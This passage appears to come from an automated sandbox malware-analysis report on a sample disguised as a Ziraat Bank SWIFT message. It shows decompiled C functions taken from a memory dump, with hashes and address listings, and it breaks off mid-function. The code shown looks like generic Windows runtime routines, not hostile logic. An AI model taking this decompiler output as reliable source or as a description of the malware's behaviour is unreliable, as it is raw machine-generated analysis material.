                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                    • Instruction ID: d11126ffbc35e883eefe7d2f03c7b69d94e1c0fc7118b693e43ad6bd86a0205e
                                                                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                    • Instruction Fuzzy Hash: DB019671140616BFE711AF6DCC80E67FB7DFF54755F404525F21486560C721ADA0C6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E01964015(signed int __eax, signed int __ecx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed char _t10;
                                                                    				signed int _t28;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t28 = __ecx;
                                                                    				asm("lock xadd [edi+0x24], eax");
                                                                    				_t10 = (__eax | 0xffffffff) - 1;
                                                                    				if(_t10 == 0) {
                                                                    					_t1 = _t28 + 0x1c; // 0x1e
                                                                    					E018B2280(_t10, _t1);
                                                                    					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    					E018B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x19886ac);
                                                                    					E0189F900(0x19886d4, _t28);
                                                                    					E018AFFB0(0x19886ac, _t28, 0x19886ac);
                                                                    					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                    					E018AFFB0(0, _t28, _t1);
                                                                    					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                    					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                    						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                    					}
                                                                    					_t10 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                    				}
                                                                    				return _t10;
                                                                    			}







                                                                    0x0196401a
                                                                    0x0196401e
                                                                    0x01964023
                                                                    0x01964028
                                                                    0x01964029
                                                                    0x0196402b
                                                                    0x0196402f
                                                                    0x01964043
                                                                    0x01964046
                                                                    0x01964051
                                                                    0x01964057
                                                                    0x0196405f
                                                                    0x01964062
                                                                    0x01964067
                                                                    0x0196406f
                                                                    0x0196407c
                                                                    0x0196407c
                                                                    0x0196408c
                                                                    0x0196408c
                                                                    0x01964097

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e954e77422f059105d158d3eed846dca3f813c382527b5c0bd3c32a6990a7fd2
                                                                    • Instruction ID: 7afd48f8853366d06280bfba240f30479fdc5b5f3e8e1846d42bcbe1a9b7306b
                                                                    • Opcode Fuzzy Hash: e954e77422f059105d158d3eed846dca3f813c382527b5c0bd3c32a6990a7fd2
                                                                    • Instruction Fuzzy Hash: A2018F72241A467FD715AB6DCD80E57FBACFF95760B000229B608C7A51CB24ED11C6E5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 61%
                                                                    			E019514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				short _v54;
                                                                    				char _v60;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed char* _t21;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr _t33;
                                                                    				intOrPtr _t34;
                                                                    				signed int _t35;
                                                                    
                                                                    				_t32 = __edx;
                                                                    				_t27 = __ebx;
                                                                    				_v8 =  *0x198d360 ^ _t35;
                                                                    				_t33 = __edx;
                                                                    				_t34 = __ecx;
                                                                    				E018DFA60( &_v60, 0, 0x30);
                                                                    				_v20 = _a4;
                                                                    				_v16 = _a8;
                                                                    				_v28 = _t34;
                                                                    				_v24 = _t33;
                                                                    				_v54 = 0x1034;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t21 = 0x7ffe0388;
                                                                    				} else {
                                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    				}
                                                                    				_push( &_v60);
                                                                    				_push(0x10);
                                                                    				_push(0x20402);
                                                                    				_push( *_t21 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                    			}

















                                                                    0x019514fb
                                                                    0x019514fb
                                                                    0x0195150a
                                                                    0x01951514
                                                                    0x01951519
                                                                    0x0195151b
                                                                    0x01951526
                                                                    0x0195152c
                                                                    0x01951534
                                                                    0x01951537
                                                                    0x0195153a
                                                                    0x01951545
                                                                    0x01951557
                                                                    0x01951547
                                                                    0x01951550
                                                                    0x01951550
                                                                    0x01951562
                                                                    0x01951563
                                                                    0x01951565
                                                                    0x0195156a
                                                                    0x0195157f

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6753f134594307c21dd40c640a7003ad0fff8f6e5f089bcd20692f5b9575204
                                                                    • Instruction ID: 94dd1a4803e5d4d4995883896144935de914bb3871a476609a4a239717d6efe4
                                                                    • Opcode Fuzzy Hash: a6753f134594307c21dd40c640a7003ad0fff8f6e5f089bcd20692f5b9575204
                                                                    • Instruction Fuzzy Hash: 60018C71A01258ABCB14EFACD841EAEBBB8EF45714F04406AF905EB280DA70DA01CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 61%
                                                                    			E0195138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				short _v54;
                                                                    				char _v60;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed char* _t21;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr _t33;
                                                                    				intOrPtr _t34;
                                                                    				signed int _t35;
                                                                    
                                                                    				_t32 = __edx;
                                                                    				_t27 = __ebx;
                                                                    				_v8 =  *0x198d360 ^ _t35;
                                                                    				_t33 = __edx;
                                                                    				_t34 = __ecx;
                                                                    				E018DFA60( &_v60, 0, 0x30);
                                                                    				_v20 = _a4;
                                                                    				_v16 = _a8;
                                                                    				_v28 = _t34;
                                                                    				_v24 = _t33;
                                                                    				_v54 = 0x1033;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t21 = 0x7ffe0388;
                                                                    				} else {
                                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    				}
                                                                    				_push( &_v60);
                                                                    				_push(0x10);
                                                                    				_push(0x20402);
                                                                    				_push( *_t21 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                    			}

















                                                                    0x0195138a
                                                                    0x0195138a
                                                                    0x01951399
                                                                    0x019513a3
                                                                    0x019513a8
                                                                    0x019513aa
                                                                    0x019513b5
                                                                    0x019513bb
                                                                    0x019513c3
                                                                    0x019513c6
                                                                    0x019513c9
                                                                    0x019513d4
                                                                    0x019513e6
                                                                    0x019513d6
                                                                    0x019513df
                                                                    0x019513df
                                                                    0x019513f1
                                                                    0x019513f2
                                                                    0x019513f4
                                                                    0x019513f9
                                                                    0x0195140e

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e7e80f0617cbc3e121ddb77c1806c469df6686f90ada9cbb980fd1ca5862c06
                                                                    • Instruction ID: b59d9ed9665528953ad344c163a8e514758160d313eb5b75122857a9445edc90
                                                                    • Opcode Fuzzy Hash: 6e7e80f0617cbc3e121ddb77c1806c469df6686f90ada9cbb980fd1ca5862c06
                                                                    • Instruction Fuzzy Hash: 40019E71A00318AFCB14DFACD881FAEBBB8EF44710F00406AF904EB380DA709A01CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E018958EC(intOrPtr __ecx) {
                                                                    				signed int _v8;
                                                                    				char _v28;
                                                                    				char _v44;
                                                                    				char _v76;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr _t16;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr _t28;
                                                                    				signed int _t29;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t29;
                                                                    				_t10 =  *[fs:0x30];
                                                                    				_t27 = __ecx;
                                                                    				if(_t10 == 0) {
                                                                    					L6:
                                                                    					_t28 = 0x1875c80;
                                                                    				} else {
                                                                    					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                    					if(_t16 == 0) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                    					}
                                                                    				}
                                                                    				if(E01895943() != 0 &&  *0x1985320 > 5) {
                                                                    					E01917B5E( &_v44, _t27);
                                                                    					_t22 =  &_v28;
                                                                    					E01917B5E( &_v28, _t28);
                                                                    					_t11 = E01917B9C(0x1985320, 0x187bf15,  &_v28, _t22, 4,  &_v76);
                                                                    				}
                                                                    				return E018DB640(_t11, _t17, _v8 ^ _t29, 0x187bf15, _t27, _t28);
                                                                    			}















                                                                    0x018958fb
                                                                    0x018958fe
                                                                    0x01895906
                                                                    0x0189590a
                                                                    0x0189593c
                                                                    0x0189593c
                                                                    0x0189590c
                                                                    0x0189590c
                                                                    0x01895911
                                                                    0x00000000
                                                                    0x01895913
                                                                    0x01895913
                                                                    0x01895913
                                                                    0x01895911
                                                                    0x0189591d
                                                                    0x018f1035
                                                                    0x018f103c
                                                                    0x018f103f
                                                                    0x018f1056
                                                                    0x018f1056
                                                                    0x0189593b

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 759fb9095a09d9ad1daa0127b9a66f40b3d89c4657e47b329b2537e4410ac73d
                                                                    • Instruction ID: 47996c4d65da8f354b077c94983c11135305d5d87edf5e6ec967f49c1e3fba9f
                                                                    • Opcode Fuzzy Hash: 759fb9095a09d9ad1daa0127b9a66f40b3d89c4657e47b329b2537e4410ac73d
                                                                    • Instruction Fuzzy Hash: E1018F31A00109DBEB19EA69E8009AEB7A8EB85370F59406A9A09D7244DF30DE05C691
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                    				signed char _t11;
                                                                    				signed char* _t12;
                                                                    				intOrPtr _t24;
                                                                    				signed short* _t25;
                                                                    
                                                                    				_t25 = __edx;
                                                                    				_t24 = __ecx;
                                                                    				_t11 = ( *[fs:0x30])[0x50];
                                                                    				if(_t11 != 0) {
                                                                    					if( *_t11 == 0) {
                                                                    						goto L1;
                                                                    					}
                                                                    					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                    					L2:
                                                                    					if( *_t12 != 0) {
                                                                    						_t12 =  *[fs:0x30];
                                                                    						if((_t12[0x240] & 0x00000004) == 0) {
                                                                    							goto L3;
                                                                    						}
                                                                    						if(E018B7D50() == 0) {
                                                                    							_t12 = 0x7ffe0385;
                                                                    						} else {
                                                                    							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                    						}
                                                                    						if(( *_t12 & 0x00000020) == 0) {
                                                                    							goto L3;
                                                                    						}
                                                                    						return E01917016(_a4, _t24, 0, 0, _t25, 0);
                                                                    					}
                                                                    					L3:
                                                                    					return _t12;
                                                                    				}
                                                                    				L1:
                                                                    				_t12 = 0x7ffe0384;
                                                                    				goto L2;
                                                                    			}







                                                                    0x018ab037
                                                                    0x018ab039
                                                                    0x018ab03b
                                                                    0x018ab040
                                                                    0x018fa60e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018fa61d
                                                                    0x018ab04b
                                                                    0x018ab04e
                                                                    0x018fa627
                                                                    0x018fa634
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018fa641
                                                                    0x018fa653
                                                                    0x018fa643
                                                                    0x018fa64c
                                                                    0x018fa64c
                                                                    0x018fa65b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018fa66c
                                                                    0x018ab057
                                                                    0x018ab057
                                                                    0x018ab057
                                                                    0x018ab046
                                                                    0x018ab046
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                    • Instruction ID: 9bb342ee1d86e206a7a51f3e2b194bdbfb4390458f977d50a0f79dfc0ea8468b
                                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                    • Instruction Fuzzy Hash: 9C018F32241A849FE326875CC988F667BE8EB85764F0940A5FA19CBA91D629DE40C621
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E01961074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                    				char _v8;
                                                                    				void* _v11;
                                                                    				unsigned int _v12;
                                                                    				void* _v15;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				char* _t16;
                                                                    				signed int* _t35;
                                                                    
                                                                    				_t22 = __ebx;
                                                                    				_t35 = __ecx;
                                                                    				_v8 = __edx;
                                                                    				_t13 =  !( *__ecx) + 1;
                                                                    				_v12 =  !( *__ecx) + 1;
                                                                    				if(_a4 != 0) {
                                                                    					E0196165E(__ebx, 0x1988ae4, (__edx -  *0x1988b04 >> 0x14) + (__edx -  *0x1988b04 >> 0x14), __edi, __ecx, (__edx -  *0x1988b04 >> 0x14) + (__edx -  *0x1988b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                    				}
                                                                    				E0195AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t16 = 0x7ffe0388;
                                                                    				} else {
                                                                    					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    				}
                                                                    				if( *_t16 != 0) {
                                                                    					_t16 = E0194FE3F(_t22, _t35, _v8, _v12);
                                                                    				}
                                                                    				return _t16;
                                                                    			}











                                                                    0x01961074
                                                                    0x01961080
                                                                    0x01961082
                                                                    0x0196108a
                                                                    0x0196108f
                                                                    0x01961093
                                                                    0x019610ab
                                                                    0x019610ab
                                                                    0x019610c3
                                                                    0x019610cf
                                                                    0x019610e1
                                                                    0x019610d1
                                                                    0x019610da
                                                                    0x019610da
                                                                    0x019610e9
                                                                    0x019610f5
                                                                    0x019610f5
                                                                    0x019610fe

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8df09bbc8588b806d7911a515d2d2e07c6cedc2e4eb8efa237a5779e6cb33fb7
                                                                    • Instruction ID: eaf663d6d080ab546460e0b502d64fa7fc48950a864029213cc93002de53b4dd
                                                                    • Opcode Fuzzy Hash: 8df09bbc8588b806d7911a515d2d2e07c6cedc2e4eb8efa237a5779e6cb33fb7
                                                                    • Instruction Fuzzy Hash: C901FC726047429FC711EF6DC944B1ABBEDABD4311F048A29F989D3690DE31D944CBB2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 59%
                                                                    			E0194FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				signed int _v12;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				short _v58;
                                                                    				char _v64;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed char* _t18;
                                                                    				intOrPtr _t24;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t31;
                                                                    				signed int _t32;
                                                                    
                                                                    				_t29 = __edx;
                                                                    				_t24 = __ebx;
                                                                    				_v12 =  *0x198d360 ^ _t32;
                                                                    				_t30 = __edx;
                                                                    				_t31 = __ecx;
                                                                    				E018DFA60( &_v64, 0, 0x30);
                                                                    				_v24 = _a4;
                                                                    				_v32 = _t31;
                                                                    				_v28 = _t30;
                                                                    				_v58 = 0x266;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t18 = 0x7ffe0388;
                                                                    				} else {
                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    				}
                                                                    				_push( &_v64);
                                                                    				_push(0x10);
                                                                    				_push(0x20402);
                                                                    				_push( *_t18 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                    			}
















                                                                    0x0194fec0
                                                                    0x0194fec0
                                                                    0x0194fecf
                                                                    0x0194fed9
                                                                    0x0194fede
                                                                    0x0194fee0
                                                                    0x0194feeb
                                                                    0x0194fef3
                                                                    0x0194fef6
                                                                    0x0194fef9
                                                                    0x0194ff04
                                                                    0x0194ff16
                                                                    0x0194ff06
                                                                    0x0194ff0f
                                                                    0x0194ff0f
                                                                    0x0194ff21
                                                                    0x0194ff22
                                                                    0x0194ff24
                                                                    0x0194ff29
                                                                    0x0194ff3e

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd2ce979dee5331ff77a9aa243b6306c1224bcbdabcdda88b33e65128c6b4976
                                                                    • Instruction ID: 8e55415fa219f4a4ba486a08b6218e97736a0ec910b7abdb8b3ca57a3978c8fd
                                                                    • Opcode Fuzzy Hash: bd2ce979dee5331ff77a9aa243b6306c1224bcbdabcdda88b33e65128c6b4976
                                                                    • Instruction Fuzzy Hash: 96018471E01319ABDB14DBADD845FAEBBB8EF45710F044066F905EB380DA709A01C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 59%
                                                                    			E0194FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				signed int _v12;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				short _v58;
                                                                    				char _v64;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed char* _t18;
                                                                    				intOrPtr _t24;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t31;
                                                                    				signed int _t32;
                                                                    
                                                                    				_t29 = __edx;
                                                                    				_t24 = __ebx;
                                                                    				_v12 =  *0x198d360 ^ _t32;
                                                                    				_t30 = __edx;
                                                                    				_t31 = __ecx;
                                                                    				E018DFA60( &_v64, 0, 0x30);
                                                                    				_v24 = _a4;
                                                                    				_v32 = _t31;
                                                                    				_v28 = _t30;
                                                                    				_v58 = 0x267;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t18 = 0x7ffe0388;
                                                                    				} else {
                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    				}
                                                                    				_push( &_v64);
                                                                    				_push(0x10);
                                                                    				_push(0x20402);
                                                                    				_push( *_t18 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                    			}
















                                                                    0x0194fe3f
                                                                    0x0194fe3f
                                                                    0x0194fe4e
                                                                    0x0194fe58
                                                                    0x0194fe5d
                                                                    0x0194fe5f
                                                                    0x0194fe6a
                                                                    0x0194fe72
                                                                    0x0194fe75
                                                                    0x0194fe78
                                                                    0x0194fe83
                                                                    0x0194fe95
                                                                    0x0194fe85
                                                                    0x0194fe8e
                                                                    0x0194fe8e
                                                                    0x0194fea0
                                                                    0x0194fea1
                                                                    0x0194fea3
                                                                    0x0194fea8
                                                                    0x0194febd

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ded3cc9f815e32c3100ced30153a92ccfaef439b7167ee6c9a72cab84e7e3e7
                                                                    • Instruction ID: 624407b7aba352b9af151be388035c70b7c819dff4fbab3738f69c55717fd230
                                                                    • Opcode Fuzzy Hash: 5ded3cc9f815e32c3100ced30153a92ccfaef439b7167ee6c9a72cab84e7e3e7
                                                                    • Instruction Fuzzy Hash: 6201B171A00319ABCB14DBACD841EAEBBB8EF40704F004066B900EB280DA30AA01C796
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 54%
                                                                    			E01968ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				intOrPtr _v36;
                                                                    				short _v62;
                                                                    				char _v68;
                                                                    				signed char* _t29;
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr _t41;
                                                                    				intOrPtr _t42;
                                                                    				signed int _t43;
                                                                    
                                                                    				_t40 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t43;
                                                                    				_v28 = __ecx;
                                                                    				_v62 = 0x1c2a;
                                                                    				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                    				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                    				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                    				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                    				_v24 = __edx;
                                                                    				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t29 = 0x7ffe0386;
                                                                    				} else {
                                                                    					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    				}
                                                                    				_push( &_v68);
                                                                    				_push(0x1c);
                                                                    				_push(0x20402);
                                                                    				_push( *_t29 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                    			}


















                                                                    0x01968ed6
                                                                    0x01968ee5
                                                                    0x01968eed
                                                                    0x01968ef0
                                                                    0x01968efa
                                                                    0x01968f03
                                                                    0x01968f0c
                                                                    0x01968f15
                                                                    0x01968f24
                                                                    0x01968f27
                                                                    0x01968f31
                                                                    0x01968f43
                                                                    0x01968f33
                                                                    0x01968f3c
                                                                    0x01968f3c
                                                                    0x01968f4e
                                                                    0x01968f4f
                                                                    0x01968f51
                                                                    0x01968f56
                                                                    0x01968f69

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43f54a30ad83c188ef0277623dc1b35c977c291d4b48a457e50b50c24ae124be
                                                                    • Instruction ID: 84bbf94770345dcf2f7cb1f724a1fb5e3a18fb24ebbe061e56cb99c5e46e572d
                                                                    • Opcode Fuzzy Hash: 43f54a30ad83c188ef0277623dc1b35c977c291d4b48a457e50b50c24ae124be
                                                                    • Instruction Fuzzy Hash: E011DE71E052599FDB04DFA9D541BAEBBF4FF08300F1442AAE519EB782E6349A40CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 54%
                                                                    			E01968A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				signed int _v12;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v40;
                                                                    				short _v66;
                                                                    				char _v72;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed char* _t18;
                                                                    				signed int _t32;
                                                                    
                                                                    				_t29 = __edx;
                                                                    				_v12 =  *0x198d360 ^ _t32;
                                                                    				_t31 = _a8;
                                                                    				_t30 = _a12;
                                                                    				_v66 = 0x1c20;
                                                                    				_v40 = __ecx;
                                                                    				_v36 = __edx;
                                                                    				_v32 = _a4;
                                                                    				_v28 = _a8;
                                                                    				_v24 = _a12;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t18 = 0x7ffe0386;
                                                                    				} else {
